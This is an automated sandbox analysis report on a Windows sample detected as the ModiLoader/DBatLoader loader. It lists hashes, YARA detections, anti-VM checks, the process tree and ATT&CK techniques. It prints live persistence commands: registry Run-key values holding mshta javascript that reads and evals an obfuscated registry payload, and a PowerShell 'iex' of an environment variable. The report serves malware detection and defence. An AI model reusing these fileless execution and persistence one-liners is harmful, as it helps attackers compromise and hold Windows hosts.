Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 16:26
Static task
static1
Behavioral task
behavioral1
Sample
f4f8bdef1fcc6271e430ac06a14e7fb8.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
f4f8bdef1fcc6271e430ac06a14e7fb8.exe
Resource
win10v2004-20240802-en
General
-
Target
f4f8bdef1fcc6271e430ac06a14e7fb8.exe
-
Size
408KB
-
MD5
f4f8bdef1fcc6271e430ac06a14e7fb8
-
SHA1
ee8717fefe44c90cdd41ff52fd3402a565c3986a
-
SHA256
b2e580936468414e204e9da4fd5c0b2b5719c3a6af5bb2796d29e061cfa872cc
-
SHA512
601dae6fc4cfc6215aa7ac79d6ad4ca4004d699e576facd03c63a27ef89592739f10b9313b4c2193cc1ad0872d836030208facf1b50a7263a7ba47dccce15478
-
SSDEEP
6144:IUqmsjhG9pJ8NU8Z1+3iFLs+4MrQLhElL9nZ0p5Vf0Wuk0d4ohXyulBiJ2EE:LajhG9pJmN4e5LIQZ0fVfMHituz02n
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1456 2804 mshta.exe 30 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 54 IoCs
resource yara_rule behavioral1/memory/1864-9-0x0000000000400000-0x000000000046A000-memory.dmp modiloader_stage2 behavioral1/memory/1864-11-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-12-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-15-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-14-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-13-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-16-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1864-20-0x0000000000400000-0x000000000046A000-memory.dmp modiloader_stage2 behavioral1/memory/2744-27-0x0000000006230000-0x00000000062F0000-memory.dmp modiloader_stage2 behavioral1/memory/2744-30-0x0000000006230000-0x00000000062F0000-memory.dmp modiloader_stage2 behavioral1/memory/1596-34-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-36-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-33-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-35-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-38-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-37-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-44-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-41-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-47-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-46-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-45-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-43-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-42-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-40-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-39-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/236-51-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/236-52-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/236-56-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/236-55-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/236-54-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/236-53-0x0000000000150000-0x0000000000210000-memory.dmp modiloader_stage2 behavioral1/memory/1596-57-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-59-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-69-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-75-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-74-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-73-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-72-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-71-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-77-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-76-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-70-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-68-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-67-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-66-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-65-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-64-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-63-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-62-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-61-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-60-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-58-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-78-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 behavioral1/memory/1596-80-0x0000000000090000-0x0000000000150000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:vQZ8mZ2t=\"P\";N6k=new%20ActiveXObject(\"WScript.Shell\");sLjMpU9p7=\"z4O6O\";Z7heV=N6k.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\35658840dd\\\\b64cc699\");Cu9Sjvd5l=\"n10P\";eval(Z7heV);oCuhOa7A=\"rX\";" regsvr32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 1596 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:hBxZOC3M=\"1Mcfe\";y5o=new%20ActiveXObject(\"WScript.Shell\");twiKlA1rl=\"Ih\";I14RuW=y5o.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\35658840dd\\\\b64cc699\");Zs8AwLSl0z=\"3OeJr33I\";eval(I14RuW);jpSdXo6pc6=\"VEjO\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:wgXW63ium=\"sSBkZGjVqU\";KZ0=new%20ActiveXObject(\"WScript.Shell\");Ee2jWrZR3=\"MOnRRxuG7X\";nuS7Q=KZ0.RegRead(\"HKCU\\\\software\\\\35658840dd\\\\b64cc699\");RUbgiV7c=\"4pIb\";eval(nuS7Q);GoFvo2j=\"NLRo\";" regsvr32.exe -
pid Process 2744 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f4f8bdef1fcc6271e430ac06a14e7fb8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2744 powershell.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 1596 regsvr32.exe 1596 regsvr32.exe 1596 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1456 wrote to memory of 2744 1456 mshta.exe 32 PID 1456 wrote to memory of 2744 1456 mshta.exe 32 PID 1456 wrote to memory of 2744 1456 mshta.exe 32 PID 1456 wrote to memory of 2744 1456 mshta.exe 32 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 2744 wrote to memory of 1596 2744 powershell.exe 35 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36 PID 1596 wrote to memory of 236 1596 regsvr32.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\f4f8bdef1fcc6271e430ac06a14e7fb8.exe"C:\Users\Admin\AppData\Local\Temp\f4f8bdef1fcc6271e430ac06a14e7fb8.exe"1⤵
- System Location Discovery: System Language Discovery
PID:1864
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:NM8q1Eeu="M0";W98F=new%20ActiveXObject("WScript.Shell");jepqfY8a5Y="ZksTM2uCf5";i4zbS1=W98F.RegRead("HKLM\\software\\Wow6432Node\\cNejaW8F\\BidEYt5Gg");uVA1ibEgI="F3a9x";eval(i4zbS1);zkykU1A="9";1⤵
- Process spawned unexpected child process
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cxgwa2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:236
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2